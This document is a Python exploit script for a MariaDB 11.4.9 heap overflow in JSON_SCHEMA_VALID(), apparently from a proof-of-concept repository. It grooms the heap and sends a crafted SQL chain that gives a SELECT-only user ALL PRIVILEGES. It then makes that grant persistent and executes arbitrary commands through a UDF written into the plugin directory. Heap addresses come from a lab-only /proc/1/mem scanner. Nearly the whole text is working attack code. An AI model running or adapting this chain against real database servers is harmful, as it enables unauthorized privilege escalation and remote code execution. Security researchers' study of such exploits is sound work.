README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-32710 — Heap OOB Write → Privilege Escalation → UDF RCE
Stage 1: Two-hop arbitrary write via JSON_SCHEMA_VALID() heap overflow.
SELECT-only user → ALL PRIVILEGES WITH GRANT OPTION.
Chain payload is pure SQL over TCP.
Stage 2: UDF code execution via DUMPFILE + CREATE FUNCTION.
Writes pre-compiled .so to plugin_dir, executes arbitrary commands.
Target: MariaDB 11.4.9 (Docker, ASLR disabled on host)
Lab-assisted: The script uses Docker/root introspection to read /proc/1/mem
and discover heap layout. The actual exploit chain is pure SQL over TCP.
A weaponized exploit would need an info-leak primitive to replace the
memory introspection step.
Usage:
./setup.sh # build and start the lab
python3 exploit.py # auto-calibrate and exploit
python3 exploit.py --calibrate # measure constants only
python3 exploit.py --cmd 'id > /tmp/pwned' # custom command
"""
import argparse
import hashlib
import json
import socket
import struct
import subprocess
import sys
import time
CONTAINER = "mariadb-cve-2026-32710"
VAR_A = "a" * 40
VAR_B = "b" * 40
VAR_C = "c" * 40
EXHAUST_COUNT = 100
MA_STRUCT_OFFSET = 1712 # Security_context::master_access offset in struct
# =========================================================================== #
# Minimal MySQL/MariaDB protocol client (no external dependencies) #
# =========================================================================== #
class MySQL:
"""COM_QUERY-only MySQL client over TCP."""
def __init__(self, host, port, user, password, db=None, timeout=30):
self.sock = socket.create_connection((host, port), timeout=timeout)
self.sock.settimeout(timeout)
self._auth(user, password, db)
def _recv(self, n):
buf = bytearray()
while len(buf) < n:
c = self.sock.recv(n - len(buf))
if not c:
raise ConnectionError("server closed connection")
buf += c
return bytes(buf)
def _rpkt(self):
h = self._recv(4)
plen = int.from_bytes(h[:3], "little")
return h[3], self._recv(plen)
def _wpkt(self, seq, data):
self.sock.sendall(
len(data).to_bytes(3, "little") + bytes([seq & 0xFF]) + data
)
def _auth(self, user, pw, db):
_, g = self._rpkt()
nul = g.index(0, 1)
p = nul + 5
salt1 = g[p : p + 8]
p += 9 + 2 + 1 + 2 + 2 + 1 + 10
salt2 = g[p : p + 12]
salt = salt1 + salt2
if pw:
h1 = hashlib.sha1(pw.encode()).digest()
h2 = hashlib.sha1(h1).digest()
h3 = hashlib.sha1(salt + h2).digest()
token = bytes(a ^ b for a, b in zip(h1, h3))
else:
token = b""
caps = 0x000FA68D | (0x08 if db else 0)
r = struct.pack("<II", caps, 1 << 24) + b"\x21" + b"\x00" * 23
r += user.encode() + b"\x00" + bytes([len(token)]) + token
if db:
r += db.encode() + b"\x00"
self._wpkt(1, r)
_, reply = self._rpkt()
if reply[0] == 0xFF:
raise Exception(f"auth: {reply[9:].decode(errors='replace')}")
def _lenenc(self, d, p):
b = d[p]
if b < 0xFB:
return b, p + 1
if b == 0xFC:
return int.from_bytes(d[p + 1 : p + 3], "little"), p + 3
if b == 0xFD:
return int.from_bytes(d[p + 1 : p + 4], "little"), p + 4
return int.from_bytes(d[p + 1 : p + 9], "little"), p + 9
def query(self, sql):
self._wpkt(0, b"\x03" + sql.encode("utf-8"))
_, pkt = self._rpkt()
if pkt[0] == 0xFF:
return [f"ERR:{pkt[9:].decode(errors='replace')}"]
if pkt[0] == 0x00:
return ["OK"]
ncols = pkt[0] if pkt[0] < 0xFB else 0
for _ in range(ncols):
self._rpkt()
self._rpkt()
rows = []
while True:
_, rp = self._rpkt()
if rp[0] == 0xFE and len(rp) < 9:
break
if rp[0] == 0xFF:
rows.append(f"ERR:{rp[9:].decode(errors='replace')}")
break
parts, pos = [], 0
for _ in range(ncols):
if rp[pos] == 0xFB:
parts.append("NULL")
pos += 1
else:
sl, pos = self._lenenc(rp, pos)
parts.append(rp[pos : pos + sl].decode(errors="replace"))
pos += sl
rows.append("\t".join(parts))
return rows
def alive(self):
try:
r = self.query("SELECT 1")
return r and "1" in r[0]
except Exception:
return False
def close(self):
try:
self._wpkt(0, b"\x01")
self.sock.close()
except Exception:
pass
# =========================================================================== #
# Heap introspection (lab-assisted — requires docker exec as root) #
# =========================================================================== #
SCANNER_TEMPLATE = r"""
import struct, json
mem = open("/proc/1/mem", "rb")
def rm(a, s):
try:
mem.seek(a); return mem.read(s)
except: return None
ranges = []
with open("/proc/1/maps") as f:
for l in f:
if "rw-p" not in l: continue
p = l.split(); a = p[0].split("-")
s, e = int(a[0],16), int(a[1],16)
if e-s > 4194304: continue
if len(p) > 5 and p[5].strip(): continue
ranges.append((s,e))
entries = {}
master_access = []
MA_OFF = %d
for s, e in ranges:
d = rm(s, e-s)
if not d: continue
for off in range(0, len(d)-128, 8):
nl = struct.unpack("<Q", d[off+24:off+32])[0]
if nl != 40: continue
ns = struct.unpack("<Q", d[off+16:off+24])[0]
if not (0x7f0000000000 <= ns <= 0x7fffffffffff): continue
nd = rm(ns, 41)
if not nd: continue
try: name = nd[:40].decode("ascii")
except: continue
ch = name[0]
if ch not in "abc" or not all(c == ch for c in name): continue
vp = struct.unpack("<Q", d[off+32:off+40])[0]
vl = struct.unpack("<Q", d[off+40:off+48])[0]
if not (0x7f0000000000 <= vp <= 0x7fffffffffff): continue
if ch not in entries:
entries[ch] = {"name": ch, "addr": s+off, "value_ptr": vp, "value_len": vl}
off2 = 0
while True:
idx = d.find(b"lowpriv\x00", off2)
if idx == -1: break
sc = idx - 24
if sc >= 0 and sc + MA_OFF + 8 <= len(d):
u = struct.unpack("<Q", d[sc+8:sc+16])[0]
if u and (0x7f0000000000 <= u <= 0x7fffffffffff):
ud = rm(u, 8)
if ud and ud[:7] == b"lowpriv":
ma = struct.unpack("<Q", d[sc+MA_OFF:sc+MA_OFF+8])[0]
master_access.append({"addr": s+sc+MA_OFF, "val": ma, "base": s+sc})
off2 = idx + 1
mem.close()
print(json.dumps({"entries": entries, "ma": master_access}))
"""
def json_safe(b):
return b not in (0x00, 0x22, 0x5C) and not (0x01 <= b <= 0x1F)
def scan_heap(container):
"""Scan mariadbd heap to find user_var_entry structs and master_access."""
r = subprocess.run(
["docker", "exec", container, "python3", "-c",
SCANNER_TEMPLATE % MA_STRUCT_OFFSET],
capture_output=True, text=True, timeout=60,
)
if r.returncode != 0:
return None, r.stderr[:200]
try:
data = json.loads(r.stdout)
except json.JSONDecodeError:
return None, r.stdout[:200]
ents = data.get("entries", {})
if not all(k in ents for k in "ac"):
return None, f"missing entries (found: {list(ents.keys())})"
if not data["ma"]:
return None, "no master_access found"
ea = ents["a"]
ec = ents["c"]
ma = data["ma"][0]
a32 = ea["addr"] + 32
lo = a32 & 0xFF
hi = (a32 >> 8) & 0xFF
if not json_safe(lo) or not json_safe(hi):
return None, f"non-JSON-safe bytes (LO=0x{lo:02x} HI=0x{hi:02x})"
if (ec["value_ptr"] >> 16) != (a32 >> 16):
return None, "entry_c->value and entry_a+32 in different 64KB pages"
return {
"lo": lo, "hi": hi,
"ma_addr": ma["addr"], "ma_val": ma["val"],
"ea_addr": ea["addr"], "ea_value": ea["value_ptr"],
"ec_addr": ec["addr"], "ec_value": ec["value_ptr"],
"sc_base": ma["base"],
}, None
def read_memory(container, addr, size):
"""Read raw bytes from mariadbd process memory."""
r = subprocess.run(
["docker", "exec", container, "python3", "-c",
f"m=open('/proc/1/mem','rb');m.seek({addr});print(m.read({size}).hex());m.close()"],
capture_output=True, text=True, timeout=10,
)
if r.returncode == 0 and "Error" not in r.stdout:
try:
return bytes.fromhex(r.stdout.strip())
except ValueError:
pass
return None
# =========================================================================== #
# Stage 1: Privilege escalation (SQL chain over TCP) #
# =========================================================================== #
def groom(db):
"""Exhaust tcache and place sentinel variables for adjacent allocation."""
for i in range(EXHAUST_COUNT):
db.query(f"SET @e{'x' * 38}{i:02d} = REPEAT('X', 127)")
db.query(f"SET @{VAR_A} = REPEAT('X', 127)")
db.query(f"SET @{VAR_B} = REPEAT('X', 127)")
db.query(f"SET @{VAR_C} = REPEAT('X', 127)")
db.query(f"SET @{VAR_A} = REPEAT('Z', 500)")
def build_chain_sql(lo, hi, ma_addr):
"""Build the single-statement two-hop chain SQL."""
ma_bytes = struct.pack("<Q", ma_addr)
overflow = (
f"json_schema_valid('{{\"enum\":[0]}}', "
f"CONCAT('\"', REPEAT(CHAR(0x41), 192), "
f"CHAR({lo}), CHAR({hi}), '\"'))"
)
hop1_parts = [f"CHAR({b})" for b in ma_bytes]
hop1_parts += [
"CHAR(9)", "REPEAT(CHAR(0), 7)", # length = 9
"CHAR(3)", "REPEAT(CHAR(0), 7)", # type = STRING_RESULT
"CHAR(3)", "REPEAT(CHAR(0), 7)", # decimals
"REPEAT(CHAR(0), 64)", # padding
"CHAR(0xA1)", # preserve next chunk size
"REPEAT(CHAR(0), 29)", # remaining
]
hop1 = f"CONCAT({', '.join(hop1_parts)})"
hop2 = "REPEAT(CHAR(0xFF), 8)"
return (
f"SELECT {overflow}, "
f"@{VAR_C} := {hop1}, "
f"@{VAR_A} := {hop2}"
)
def do_attempt(host, port, container, attempt_num):
"""Run one complete exploit attempt: connect → groom → scan → chain → persist."""
for retry in range(10):
try:
db = MySQL(host, port, "lowpriv", "lowpriv", "test")
break
except (ConnectionError, ConnectionRefusedError, OSError):
time.sleep(1)
else:
return None, "cannot connect after retries"
r = db.query("SELECT * FROM mysql.global_priv LIMIT 1")
if r and not r[0].startswith("ERR"):
print(" Already privileged — skipping to stage 2")
db.close()
return True
# Groom
groom(db)
# Scan (inline, for THIS connection's heap)
scan, err = scan_heap(container)
if not scan:
db.close()
return None, err
lo, hi = scan["lo"], scan["hi"]
ma_addr = scan["ma_addr"]
print(f" entry_a+32: 0x{scan['ea_addr'] + 32:016x} (LO=0x{lo:02x} HI=0x{hi:02x})")
print(f" master_access: 0x{ma_addr:016x} = 0x{scan['ma_val']:x}")
# Read master_access before chain
ma_before = read_memory(container, ma_addr, 8)
if ma_before:
print(f" BEFORE: master_access = 0x{int.from_bytes(ma_before, 'little'):x}")
# Build and fire chain
chain = build_chain_sql(lo, hi, ma_addr)
try:
r = db.query(chain)
except ConnectionError:
db.close()
return None, "connection lost during chain"
if not r or any(x.startswith("ERR") for x in r):
db.close()
return None, f"chain error: {r}"
if not db.alive():
db.close()
return None, "server crashed after chain"
print(f" Server alive after chain")
# Read master_access after chain
ma_after = read_memory(container, ma_addr, 8)
if ma_after:
val = int.from_bytes(ma_after, "little")
print(f" AFTER: master_access = 0x{val:x}")
if val != 0xFFFFFFFFFFFFFFFF:
db.close()
return None, f"master_access not set (0x{val:x})"
print(f" *** master_access = ALL PRIVILEGES ***")
# Verify
r = db.query("SELECT LOAD_FILE('/etc/hostname')")
hostname = r[0].strip() if r and r[0] != "NULL" and not r[0].startswith("ERR") else None
print(f" LOAD_FILE(/etc/hostname): {hostname or 'N/A'}")
r = db.query("SHOW GRANTS FOR CURRENT_USER()")
for row in r:
print(f" {row}")
r = db.query(
"SELECT user, host, JSON_EXTRACT(Priv, '$.access') "
"FROM mysql.global_priv LIMIT 5"
)
if r and not r[0].startswith("ERR"):
print(" mysql.global_priv readable:")
for row in r:
print(f" {row}")
else:
db.close()
return None, "cannot read mysql.global_priv"
# Persist
print("[*] Persisting escalation...")
db.query("GRANT ALL PRIVILEGES ON *.* TO 'lowpriv'@'%' WITH GRANT OPTION")
db.query("FLUSH PRIVILEGES")
print("[*] Sleeping 10s for Aria checkpoint...")
try:
db.query("SELECT SLEEP(10)")
except ConnectionError:
pass
db.close()
return True, "PERSISTENT PRIVESC"
def stage1(host, port, container, max_attempts=5):
"""Run privilege escalation with retries."""
print("[*] Stage 1: Privilege Escalation")
for i in range(max_attempts):
print(f"\n [Attempt {i + 1}/{max_attempts}]")
result = do_attempt(host, port, container, i)
if result is True:
return True
if isinstance(result, tuple):
ok, msg = result
if ok:
print(f" {msg}")
return True
print(f" Failed: {msg}")
else:
print(f" Failed: {result}")
time.sleep(1)
return False
# =========================================================================== #
# Stage 2: UDF RCE #
# =========================================================================== #
def stage2(host, port, container, command):
"""Write UDF .so → CREATE FUNCTION → execute command."""
db = ensure_server(host, port, container, "Stage 2: UDF RCE")
if not db:
return False
r = db.query("SHOW GRANTS FOR CURRENT_USER()")
if not any("ALL PRIVILEGES" in row for row in r):
print(" Privileges not persisted")
db.close()
return False
print(" ALL PRIVILEGES confirmed")
# Write UDF to plugin_dir
print("[*] Installing UDF...")
r = db.query(
"SELECT LOAD_FILE('/tmp/raptor_udf.so') "
"INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'"
)
if r and r[0].startswith("ERR"):
if "already exists" in r[0].lower():
print(" raptor.so already in plugin_dir")
else:
print(f" DUMPFILE: {r[0]}")
db.close()
return False
else:
print(" raptor.so written to plugin_dir")
db.query("DROP FUNCTION IF EXISTS sys_exec")
r = db.query("CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'raptor.so'")
if r and r[0].startswith("ERR"):
print(f" CREATE FUNCTION: {r[0]}")
db.close()
return False
print(" sys_exec() registered")
# Execute
print(f"[*] Executing: {command}")
r = db.query(f"SELECT sys_exec('{command}')")
print(f" Return code: {r[0] if r else '?'}")
if ">" in command:
outfile = command.split(">")[-1].strip().rstrip("'\" ")
r = db.query(f"SELECT LOAD_FILE('{outfile}')")
if r and r[0] != "NULL" and not r[0].startswith("ERR"):
print(f" Output: {r[0].strip()}")
db.close()
return True
# =========================================================================== #
# Persistence verification #
# =========================================================================== #
def ensure_server(host, port, container, label=""):
"""Ensure MariaDB is reachable, restarting the container if needed."""
if label:
print(f"\n[*] {label}")
for attempt in range(3):
try:
db = MySQL(host, port, "lowpriv", "lowpriv", "test", timeout=5)
return db
except Exception:
pass
print(" Server unreachable — restarting container...")
subprocess.run(
["docker", "restart", container], capture_output=True, timeout=30
)
time.sleep(5)
return None
def verify_persistence(host, port, container):
"""Verify ALL PRIVILEGES survived server restart."""
db = ensure_server(host, port, container, "Persistence check...")
if not db:
print(" Server unreachable after restart")
return False
r = db.query("SHOW GRANTS FOR CURRENT_USER()")
for row in r:
print(f" {row}")
ok = any("ALL PRIVILEGES" in row for row in r)
if ok:
r = db.query("SELECT LOAD_FILE('/etc/hostname')")
if r and r[0] != "NULL":
print(f" LOAD_FILE: {r[0].strip()}")
db.close()
return ok
# =========================================================================== #
# Calibration mode #
# =========================================================================== #
def calibrate(host, port, container):
"""Connect, groom, scan, and print measured constants."""
print("[*] Calibrating...")
db = MySQL(host, port, "lowpriv", "lowpriv", "test")
groom(db)
scan, err = scan_heap(container)
db.close()
if not scan:
print(f" Failed: {err}")
return False
a32 = scan["ea_addr"] + 32
offset = scan["ea_value"] - scan["ma_addr"]
print(f"\n entry_a: 0x{scan['ea_addr']:016x} value=0x{scan['ea_value']:016x}")
print(f" entry_a+32: 0x{a32:016x} (LO=0x{scan['lo']:02x} HI=0x{scan['hi']:02x})")
print(f" entry_c: 0x{scan['ec_addr']:016x} value=0x{scan['ec_value']:016x}")
print(f" master_access: 0x{scan['ma_addr']:016x} = 0x{scan['ma_val']:x}")
print(f" SC base: 0x{scan['sc_base']:016x}")
print(f" OFFSET: 0x{offset:x} ({offset})")
return True
# =========================================================================== #
# Main #
# =========================================================================== #
def main():
ap = argparse.ArgumentParser(
description="CVE-2026-32710: MariaDB JSON_SCHEMA_VALID() heap OOB → RCE"
)
ap.add_argument("--host", default="127.0.0.1")
ap.add_argument("--port", type=int, default=3306)
ap.add_argument("--container", default=CONTAINER)
ap.add_argument("--calibrate", action="store_true",
help="Measure heap layout constants and exit")
ap.add_argument("--cmd", default="id > /tmp/pwned",
help="Command to execute via sys_exec()")
ap.add_argument("--attempts", type=int, default=5,
help="Max stage 1 attempts")
ap.add_argument("--stage1-only", action="store_true",
help="Skip UDF RCE (stage 2)")
args = ap.parse_args()
print("=" * 70)
print("CVE-2026-32710 — Heap OOB → Privilege Escalation → UDF RCE")
print(f" Target: {args.host}:{args.port} (MariaDB 11.4.9)")
print(f" Impact: lowpriv (SELECT only) → ALL PRIVILEGES → RCE")
print(f" Method: Lab-assisted (uses /proc/1/mem for heap introspection)")
print("=" * 70)
if args.calibrate:
calibrate(args.host, args.port, args.container)
sys.exit(0)
if not stage1(args.host, args.port, args.container, args.attempts):
print("\n[!] Stage 1 FAILED")
sys.exit(1)
print("\n[+] Stage 1: PRIVILEGE ESCALATION SUCCESSFUL")
if args.stage1_only:
verify_persistence(args.host, args.port, args.container)
sys.exit(0)
if not stage2(args.host, args.port, args.container, args.cmd):
print("\n[!] Stage 2 FAILED")
verify_persistence(args.host, args.port, args.container)
sys.exit(1)
print(f"\n[+] Stage 2: COMMAND EXECUTED")
print(f" Verify: docker exec {args.container} cat /tmp/pwned")
sys.exit(0)
if __name__ == "__main__":
main()